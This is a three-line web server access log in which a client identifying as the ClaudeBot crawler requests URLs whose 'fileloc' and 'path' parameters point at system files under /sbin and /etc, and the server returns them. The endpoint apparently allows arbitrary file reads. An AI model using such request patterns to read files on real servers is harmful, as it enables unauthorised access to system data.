216.73.217.176 - - [19/May/2026:15:43:35 +0100] "GET /?fileloc=%2F%2Fsbin%2Flchage&path=%2F%2Fsbin HTTP/2" 200 8033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:38 +0100] "GET /?fileloc=%2F%2Fsbin%2Fblkdiscard&path=%2F%2Fsbin HTTP/2" 200 9477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:41 +0100] "GET /?fileloc=%2F%2Fetc%2Fcpbackup-exclude.conf&path=%2F%2Fetc HTTP/2" 200 2679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
